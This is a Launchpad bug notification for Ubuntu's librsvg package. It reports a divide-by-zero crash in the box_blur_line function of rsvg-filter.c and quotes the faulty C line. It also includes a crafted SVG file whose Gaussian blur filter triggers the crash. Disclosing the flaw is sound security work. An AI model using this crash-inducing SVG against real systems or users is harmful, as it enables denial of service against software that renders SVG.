** Information type changed from Private Security to Public Security ** Changed in: librsvg (Ubuntu) Status: New => Confirmed
-- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to librsvg in Ubuntu. https://bugs.launchpad.net/bugs/1697283 Title: Denial of Service Vulnerability in Librsvg Status in librsvg package in Ubuntu: Confirmed Bug description: An SIGFPE is raised in function box_blur_line of rsvg-filter.c when the librsvg try to parse a craft SVG file. https://github.com/GNOME/librsvg/blob/master/rsvg-filter.c#L1439 if (output >= 0) dest[bpp * output + i] = (ac[i] + (coverage >> 1)) / coverage; } The coverage could be zero. testcase.svg <svg width="100" height="120" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <filter id="blurMe"> <feGaussianBlur in="SourceGraphic" stdDeviation="0.053192302807822195 20" /> </filter> <circle cx="50" cy="50" r="50" fill="green" filter="url(#blurMe)" /> </svg> To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/librsvg/+bug/1697283/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp